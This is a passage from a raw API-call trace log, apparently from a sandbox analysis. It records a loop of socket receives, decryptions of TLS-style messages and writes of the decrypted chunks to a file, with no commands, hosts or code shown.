lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.582] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.582] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.582] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e3a60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e3a60, pfQOP=0x0) returned 0x0 [0074.582] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.582] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.582] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 986 [0074.582] recv (in: s=0x51c, buf=0x265005b, len=3142, flags=0 | out: buf=0x265005b*) returned 3142 [0074.818] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e3b74, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e3b74, pfQOP=0x0) returned 0x0 [0074.818] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.818] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.818] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.818] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e3c88, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e3c88, pfQOP=0x0) returned 0x0 [0074.819] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.819] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.819] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1480 [0074.819] recv (in: s=0x51c, buf=0x2650249, len=2648, flags=0 | out: buf=0x2650249*) returned 2648 [0074.831] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e3d9c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e3d9c, pfQOP=0x0) returned 0x0 [0074.831] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.831] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.831] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.831] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e3eb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e3eb0, pfQOP=0x0) returned 0x0 [0074.831] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.832] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.832] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 514 [0074.832] recv (in: s=0x51c, buf=0x264fe83, len=3614, flags=0 | out: buf=0x264fe83*) returned 3614 [0074.934] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e3fc4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e3fc4, pfQOP=0x0) returned 0x0 [0074.934] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.934] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.934] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3681 [0074.934] recv (in: s=0x51c, buf=0x2650ae2, len=447, flags=0 | out: buf=0x2650ae2*) returned 447 [0074.947] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e40d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e40d8, pfQOP=0x0) returned 0x0 [0074.947] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.948] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.948] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.948] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e41ec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e41ec, pfQOP=0x0) returned 0x0 [0074.948] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.948] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.948] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.948] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4300, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4300, pfQOP=0x0) returned 0x0 [0074.948] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.949] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.949] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 42 [0074.949] recv (in: s=0x51c, buf=0x264fcab, len=4086, flags=0 | out: buf=0x264fcab*) returned 2920 [0074.956] recv (in: s=0x51c, buf=0x2650813, len=1166, flags=0 | out: buf=0x2650813*) returned 1166 [0074.956] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4414, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4414, pfQOP=0x0) returned 0x0 [0074.956] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.956] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.956] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 4669 [0074.956] recv (in: s=0x51c, buf=0x2650ebe, len=7651, flags=0 | out: buf=0x2650ebe*) returned 7651 [0075.070] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4528, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4528, pfQOP=0x0) returned 0x0 [0075.070] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0075.071] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.071] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.071] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e463c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e463c, pfQOP=0x0) returned 0x0 [0075.071] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.071] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.071] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2811 [0075.071] recv (in: s=0x51c, buf=0x265077c, len=1317, flags=0 | out: buf=0x265077c*) returned 1317 [0075.083] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4750, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4750, pfQOP=0x0) returned 0x0 [0075.083] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.083] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.083] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.083] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4864, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4864, pfQOP=0x0) returned 0x0 [0075.083] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.083] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.084] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.084] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4978, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4978, pfQOP=0x0) returned 0x0 [0075.084] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.084] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.084] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2092 [0075.084] recv (in: s=0x51c, buf=0x26504ad, len=2036, flags=0 | out: buf=0x26504ad*) returned 2036 [0075.131] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4a8c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4a8c, pfQOP=0x0) returned 0x0 [0075.131] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.131] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.131] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3799 [0075.131] recv (in: s=0x51c, buf=0x2650b58, len=329, flags=0 | out: buf=0x2650b58*) returned 329 [0075.318] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4ba0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4ba0, pfQOP=0x0) returned 0x0 [0075.318] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.318] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.318] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.319] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4cb4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4cb4, pfQOP=0x0) returned 0x0 [0075.319] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.320] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.320] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.320] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4dc8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4dc8, pfQOP=0x0) returned 0x0 [0075.320] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.320] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.320] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.320] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4edc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4edc, pfQOP=0x0) returned 0x0 [0075.320] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.321] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.321] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e4ff0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e4ff0, pfQOP=0x0) returned 0x0 [0075.321] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.321] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.321] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.321] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5104, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5104, pfQOP=0x0) returned 0x0 [0075.321] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.322] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.322] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.322] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5218, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5218, pfQOP=0x0) returned 0x0 [0075.322] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.322] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.322] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.322] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e532c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e532c, pfQOP=0x0) returned 0x0 [0075.322] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.322] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.322] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 2855 [0075.323] recv (in: s=0x51c, buf=0x26507a8, len=9465, flags=0 | out: buf=0x26507a8*) returned 9465 [0075.336] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5440, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5440, pfQOP=0x0) returned 0x0 [0075.336] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0075.336] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.336] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.336] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5554, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5554, pfQOP=0x0) returned 0x0 [0075.336] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.337] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.337] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 997 [0075.337] recv (in: s=0x51c, buf=0x2650066, len=3131, flags=0 | out: buf=0x2650066*) returned 3131 [0075.382] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5668, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5668, pfQOP=0x0) returned 0x0 [0075.382] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.382] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.382] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2704 [0075.382] recv (in: s=0x51c, buf=0x2650711, len=1424, flags=0 | out: buf=0x2650711*) returned 1424 [0075.443] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e577c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e577c, pfQOP=0x0) returned 0x0 [0075.443] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.444] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.444] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.444] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5890, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5890, pfQOP=0x0) returned 0x0 [0075.444] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.444] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.444] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 278 [0075.444] recv (in: s=0x51c, buf=0x264fd97, len=3850, flags=0 | out: buf=0x264fd97*) returned 3850 [0075.453] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e59a4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e59a4, pfQOP=0x0) returned 0x0 [0075.453] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.454] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.454] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.454] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5ab8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5ab8, pfQOP=0x0) returned 0x0 [0075.454] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.454] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.454] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 772 [0075.454] recv (in: s=0x51c, buf=0x264ff85, len=3356, flags=0 | out: buf=0x264ff85*) returned 3356 [0075.459] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5bcc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5bcc, pfQOP=0x0) returned 0x0 [0075.459] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.459] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.459] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2479 [0075.459] recv (in: s=0x51c, buf=0x2650630, len=1649, flags=0 | out: buf=0x2650630*) returned 1649 [0075.517] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5ce0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5ce0, pfQOP=0x0) returned 0x0 [0075.517] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.518] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.518] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.519] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5df4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5df4, pfQOP=0x0) returned 0x0 [0075.519] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.519] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.519] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2973 [0075.519] recv (in: s=0x51c, buf=0x265081e, len=1155, flags=0 | out: buf=0x265081e*) returned 1155 [0075.572] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e5f08, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e5f08, pfQOP=0x0) returned 0x0 [0075.572] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.572] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.572] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0075.572] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e601c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e601c, pfQOP=0x0) returned 0x0 [0075.572] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.573] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.573] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3467 [0075.573] recv (in: s=0x51c, buf=0x2650a0c, len=661, flags=0 | out: buf=0x2650a0c*) returned 661 [0075.576] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6130, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6130, pfQOP=0x0) returned 0x0 [0075.576] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0075.576] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0075.576] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 5174 [0075.576] recv (in: s=0x51c, buf=0x26510b7, len=7146, flags=0 | out: buf=0x26510b7*) returned 7146 [0075.645] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e6244, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e6244, pfQOP=0x0) returned 0x0 [0075.645] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, 